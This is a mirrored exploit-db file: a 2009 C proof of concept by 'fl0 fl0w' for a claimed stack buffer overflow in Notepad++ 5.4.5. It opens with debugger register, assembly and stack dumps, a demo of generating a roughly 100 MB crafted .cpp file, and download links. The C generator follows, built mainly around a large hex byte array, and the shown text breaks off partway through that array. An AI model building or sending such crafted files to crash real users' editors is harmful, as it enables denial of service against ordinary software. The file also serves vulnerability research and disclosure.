bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/9701.c
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

558 lines
No EOL
43 KiB
C
Raw Blame History

/*
**************************************************************
(0day)Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC*
by fl0 fl0w *
**************************************************************
*/
/*****************************************************************************************************
LATEST FIXES *
Notepad++ v5.4.5 fixed bugs (from v5.4.4) : *
1. Fix plugins shortcuts not working bug. *
2. Fix the tooltip on toolbar display bug for the plugins icons. *
3. Fix a crash that was occurring when searching in files from a deep path. *
4. Fix a crash issue (Unicode binary) while close Notepad++ with an RC file opened under Chinese Xp.*
5. Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml). *
6. Add SQL folding capacity. *
******************************************************************************************************
*/
/***************************************************************************
This is the latest version of notepad++. *
As you can see no buffer overflow bug is mentioned to exist or to be fixed.*
****************************************************************************
*/
/***********************************************************
DEBUGGING INFORMATION *
CPU REGISTERS *
EAX 00000000 *
ECX 003B74C4 *
EDX 00000000 *
EBX 0999A999 *
ESP 000E0764 *
EBP 000E0834 *
ESI 00B3D760 *
EDI 003B74B0 *
EIP 1000A258 SciLexer.1000A258 *
*
Function SciLexer() is causing this bug. *
Let's look at the assembly instructions: *
*
ASSEMBLY INSTRUCTIONS *
1000A258 8910 MOV DWORD PTR DS:[EAX],EDX *
1000A25A 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] *
1000A25D 8B80 60090000 MOV EAX,DWORD PTR DS:[EAX+960] *
1000A263 8B80 B0010000 MOV EAX,DWORD PTR DS:[EAX+1B0] *
1000A269 0FAF81 24060000 IMUL EAX,DWORD PTR DS:[ECX+624]*
1000A270 2055 FF AND BYTE PTR SS:[EBP-1],DL *
1000A273 8945 C0 MOV DWORD PTR SS:[EBP-40],EAX *
1000A276 8B41 10 MOV EAX,DWORD PTR DS:[ECX+10] *
1000A279 05 6C0B0000 ADD EAX,0B6C *
1000A27E 8945 CC MOV DWORD PTR SS:[EBP-34],EAX *
1000A281 33C0 XOR EAX,EAX *
1000A283 6A 1F PUSH 1F *
1000A285 59 POP ECX *
*
EDX=00000000 *
DS:[00000000]=??? *
************************************************************
*/
/*************************************************************
STACK *
000BFEB4 004956A0 notepad+.004956A0 *
000BFEB8 F74B257B *
000BFEBC FFFFFFFE *
000BFEC0 58585858 *
000BFEC4 58585858 *
000BFEC8 58585858q *
000BFECC 58585858 *
000BFED0 58585858 *
000BFED4 58585858 *
000BFED8 58585858 *
000BFEDC 58585858 *
000BFEE0 58585858 *
000BFEE4 58585858 *
000BFEE8 58585858 *
000BFEEC 58585858 *
000BFEF4 58585858 *
000BFEF8 58585858 *
000BFEFC 58585858 *
000BFF00 58585858 *
000BFF04 58585858 *
000BFF0C 58585858 *
000BFF10 58585858 *
….................................. *
Tested succesfull on Microsoft Windows XP Service Pack 3. *
To test the exploit(notepad++.c) you need to compile it *
with cygwin console or linux environment. *
If you want to test the executable(test.exe)you need to *
copy the cygwin1.dll in the same folder as the executable. *
Notepad++ 5.4.5 crashes in a STACK BUFFER OVERFLOW when a *
specialy crafted .C/CPP file is opened.You can right click *
the file and select ->edit with notepad++ or just click open.*
Compiled with cygwin console *
For more debugging info (screenshots) *
Download the files from *
http://rapidshare.com/files/280798297/notepad___POC.zip.html *
http://www.2shared.com/file/7836030/4bfaf50b/notepad_POC.html*
http://www.filehost.ro/557267/notepad_POC_zip/ *
http://www.turboupload.com/1n8248ys8a15/notepad++_POC.zip.html
http://www.gigasize.com/get.php?d=c877pxt4pxb *
**************************************************************/
/*****************************************************************************************************************************
DEMO *
I'm in the cygwin console *
$gcc notepad++.c -o notepad *
*
Now I want to run the .exe from *
CMD console so I copy the cygwin1.dll *
in my folder and run it. *
*
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>dir *
Volume in drive C is System *
Volume Serial Number is A06E-304B *
*
Directory of C:\Documents and Settings\Stefan\Desktop\notepad++ POC *
*
2009/09/16 01:13 PM <DIR> . *
2009/09/16 01:13 PM <DIR> .. *
2008/06/12 08:35 PM 1,872,884 cygwin1.dll *
2009/09/14 03:09 PM 100,004,279 fffile.cpp *
2009/09/16 01:13 PM 18,042 note.exe *
2009/09/14 01:05 AM 12,317 NOTEPAD++ PLEASE READ.odt *
2009/09/16 01:11 PM 36,923 notepad++.c *
2009/09/11 01:40 PM 192,747 screen1.JPG *
2009/09/11 01:44 PM 224,376 screen2.JPG *
2009/09/12 08:37 PM 443,304 screen3.JPG *
8 File(s) 102,804,872 bytes *
2 Dir(s) 4,864,954,368 bytes free *
*
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>note.exe *
************************************************* *
Notepad++ 5.4.5 Stack Buffer Overflow *
Usage is:note [option1] filename *
CREDITS:fl0 fl0w *
This POC is PRIVATE *
************************************************* *
Example: *
*
-f FILE.c/cpp *
*
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>note.exe -f test.cpp *
FILE DONE ! *
path/location of the crafted file is: /cygdrive/c/Documents and Settings/Stefan/ *
Desktop/notepad++ POC/ *
*
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>dir *
Volume in drive C is System *
Volume Serial Number is A06E-304B *
*
Directory of C:\Documents and Settings\Stefan\Desktop\notepad++ POC *
*
2009/09/16 01:18 PM <DIR> . *
2009/09/16 01:18 PM <DIR> .. *
2008/06/12 08:35 PM 1,872,884 cygwin1.dll *
2009/09/14 03:09 PM 100,004,279 fffile.cpp *
2009/09/16 01:13 PM 18,042 note.exe *
2009/09/14 01:05 AM 12,317 NOTEPAD++ PLEASE READ.odt *
2009/09/16 01:11 PM 36,923 notepad++.c *
2009/09/11 01:40 PM 192,747 screen1.JPG *
2009/09/11 01:44 PM 224,376 screen2.JPG *
2009/09/12 08:37 PM 443,304 screen3.JPG *
2009/09/16 01:18 PM 100,004,279 test.cpp <--------------------------here you go now open it with notepad++ 5.4.5 *
9 File(s) 202,809,151 bytes *
2 Dir(s) 4,746,797,056 bytes free *
******************************************************************************************************************************
*/
#include "stdio.h"
#include "string.h"
#include "windows.h"
#include "getopt.h"
#include "stdint.h"
#include <fcntl.h>
#include <io.h>
#define R 0x10
#define RR 0x1F
#define SS 0x80
void CLS(int num_lines)
{
int n;
for(n = 0; n < num_lines; n++)
puts("");
}
char checksum(char data[10000], char len)
{
uint32_t sum1 = 0xffff, sum2 = 0xffff;
while (len) {
unsigned tlen = len > 360 ? 360 : len;
len -= tlen;
do {
sum1 += *data++;
sum2 += sum1;
} while (--tlen);
sum1 = (sum1 & 0xffff) + (sum1 >> 16);
sum2 = (sum2 & 0xffff) + (sum2 >> 16);
}
sum1 = (sum1 & 0xffff) + (sum1 >> 16);
sum2 = (sum2 & 0xffff) + (sum2 >> 16);
return sum2 << 16 | sum1;
}
void Buildfile(char *fname)
{
char V[] =
{
0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x73, 0x74,
0x64, 0x69, 0x6F, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63,
0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2E, 0x68, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C,
0x73, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23,
0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x67, 0x65, 0x74, 0x6F, 0x70, 0x74, 0x2E,
0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65,
0x20, 0x3C, 0x73, 0x74, 0x64, 0x69, 0x6E, 0x74, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20,
0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x20,
0x53, 0x74, 0x61, 0x72, 0x74, 0x20, 0x20, 0x7B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69,
0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75,
0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x74, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6D, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6C, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x48, 0x54, 0x4D, 0x4C, 0x3B, 0x0D, 0x0A,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74,
0x72, 0x75, 0x63, 0x74, 0x20, 0x4D, 0x69, 0x64, 0x64, 0x6C, 0x65, 0x20, 0x7B, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x3B, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x65, 0x3B, 0x20,
0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74,
0x20, 0x73, 0x61, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75,
0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x64, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x09, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x09, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x7D, 0x48, 0x45, 0x41, 0x44, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74,
0x72, 0x75, 0x63, 0x74, 0x20, 0x45, 0x6E, 0x64, 0x20, 0x20, 0x20, 0x20, 0x7B, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x62, 0x3B, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6F, 0x3B, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x44, 0x3B,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x79,
0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x42, 0x4F,
0x44, 0x59, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65,
0x20, 0x42, 0x55, 0x46, 0x46, 0x45, 0x52, 0x53, 0x49, 0x5A, 0x45, 0x20, 0x20, 0x30, 0x78, 0x31,
0x41, 0x30, 0x41, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65,
0x20, 0x46, 0x49, 0x4C, 0x45, 0x53, 0x49, 0x5A, 0x45, 0x20, 0x20, 0x20, 0x20, 0x32, 0x39, 0x41,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65, 0x20, 0x53, 0x52,
0x43, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x22, 0x3C, 0x69, 0x6D, 0x67, 0x20,
0x73, 0x72, 0x63, 0x3D, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x76, 0x6F, 0x69, 0x64, 0x20,
0x46, 0x62, 0x75, 0x69, 0x6C, 0x64, 0x28, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x66, 0x6E, 0x61,
0x6D, 0x65, 0x29, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x7B, 0x20, 0x48, 0x54, 0x4D, 0x4C, 0x20,
0x2A, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x48,
0x45, 0x41, 0x44, 0x20, 0x2A, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x42, 0x4F, 0x44, 0x59, 0x20, 0x2A, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x3B, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x6D, 0x65, 0x6D,
0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F,
0x2F, 0x22, 0x5C, 0x78, 0x34, 0x38, 0x5C, 0x78, 0x35, 0x34, 0x5C, 0x78, 0x34, 0x44, 0x5C, 0x78,
0x34, 0x43, 0x22, 0x20, 0x20, 0x2D, 0x68, 0x74, 0x6D, 0x6C, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x20, 0x3D, 0x20, 0x28, 0x48, 0x54, 0x4D, 0x4C, 0x2A,
0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x48,
0x54, 0x4D, 0x4C, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65,
0x5F, 0x61, 0x64, 0x20, 0x3D, 0x20, 0x28, 0x48, 0x45, 0x41, 0x44, 0x2A, 0x29, 0x6D, 0x61, 0x6C,
0x6C, 0x6F, 0x63, 0x28, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x48, 0x45, 0x41, 0x44, 0x29,
0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x20,
0x3D, 0x20, 0x28, 0x42, 0x4F, 0x44, 0x59, 0x2A, 0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28,
0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x42, 0x4F, 0x44, 0x59, 0x29, 0x29, 0x3B, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x20,
0x3D, 0x20, 0x28, 0x63, 0x68, 0x61, 0x72, 0x2A, 0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28,
0x42, 0x55, 0x46, 0x46, 0x45, 0x52, 0x53, 0x49, 0x5A, 0x45, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x20, 0x3D, 0x3D, 0x20,
0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x20, 0x3D, 0x3D,
0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x20, 0x3D,
0x3D, 0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66,
0x66, 0x65, 0x72, 0x20, 0x3D, 0x3D, 0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x29, 0x20, 0x7B, 0x20, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x65, 0x78, 0x69, 0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x7D, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D,
0x3E, 0x73, 0x68, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x38, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0x73, 0x74, 0x20, 0x3D, 0x20, 0x30,
0x78, 0x35, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D,
0x6C, 0x2D, 0x3E, 0x73, 0x6D, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x44, 0x3B, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0x73, 0x6C, 0x20, 0x3D,
0x20, 0x30, 0x78, 0x34, 0x43, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F,
0x73, 0x65, 0x63, 0x6F, 0x6E, 0x64, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x75, 0x72, 0x65,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x48, 0x45, 0x41, 0x44, 0x20, 0x22,
0x5C, 0x78, 0x34, 0x38, 0x5C, 0x78, 0x34, 0x35, 0x5C, 0x78, 0x34, 0x31, 0x5C, 0x78, 0x34, 0x34,
0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E,
0x73, 0x68, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x38, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E, 0x73, 0x65, 0x20, 0x3D, 0x20, 0x30, 0x78,
0x34, 0x35, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64,
0x2D, 0x3E, 0x73, 0x61, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E, 0x73, 0x64, 0x20, 0x3D, 0x20,
0x30, 0x78, 0x34, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x74,
0x68, 0x69, 0x65, 0x72, 0x64, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x75, 0x72, 0x65, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x22, 0x5C, 0x78, 0x34, 0x32, 0x5C, 0x78,
0x34, 0x46, 0x5C, 0x78, 0x34, 0x34, 0x5C, 0x78, 0x35, 0x39, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x62, 0x20, 0x3D, 0x20, 0x30,
0x78, 0x34, 0x32, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64,
0x79, 0x2D, 0x3E, 0x73, 0x6F, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x46, 0x3B, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x44, 0x20, 0x3D,
0x20, 0x30, 0x78, 0x34, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F,
0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x79, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x35, 0x39, 0x3B, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x46, 0x49, 0x4C, 0x45, 0x20, 0x2A, 0x66, 0x3B, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x20, 0x3D, 0x20, 0x66, 0x6F, 0x70, 0x65, 0x6E,
0x28, 0x66, 0x6E, 0x61, 0x6D, 0x65, 0x2C, 0x20, 0x22, 0x77, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x28, 0x20, 0x66, 0x20, 0x3D, 0x3D, 0x20, 0x4E, 0x55,
0x4C, 0x4C, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x65, 0x78, 0x69,
0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x6E, 0x74, 0x33, 0x32, 0x5F, 0x74, 0x20, 0x6F,
0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x3D, 0x20, 0x30, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,
0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B,
0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,
0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72,
0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2C, 0x20,
0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x29, 0x3B, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D,
0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x3B, 0x20,
0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63,
0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66,
0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20,
0x31, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D,
0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B,
0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B,
0x3D, 0x20, 0x31, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,
0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68,
0x65, 0x5F, 0x61, 0x64, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65, 0x5F,
0x61, 0x64, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66,
0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65,
0x5F, 0x61, 0x64, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D,
0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66,
0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D,
0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70,
0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73,
